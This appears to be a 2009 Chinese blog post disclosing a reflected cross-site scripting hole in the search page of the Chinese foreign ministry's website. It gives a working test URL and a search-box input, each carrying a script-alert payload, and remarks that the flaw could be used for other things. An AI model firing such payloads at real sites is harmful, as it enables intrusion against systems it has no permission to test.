Posted in 随笔

中国人民共和国外交部网站的一个跨站漏洞

 2009年9月2日

中华人民共和国外交部网站 http://www.fmprc.gov.cn

这个XSS漏洞不难利用,问题在 search.jsp 文件过滤不严格,且没有过滤post提交的数据,我们看看攻击的截图:

或者这个:

当然,用来做点别的也行……

测试链接:

http://www.fmprc.gov.cn/wjb/search.jsp?searchword=<script>alert('youxia')</script>

或在:

http://www.fmprc.gov.cn/wjb/search.jsp

搜索框中输入:

<script>alert('youxia')</script>

相关内容: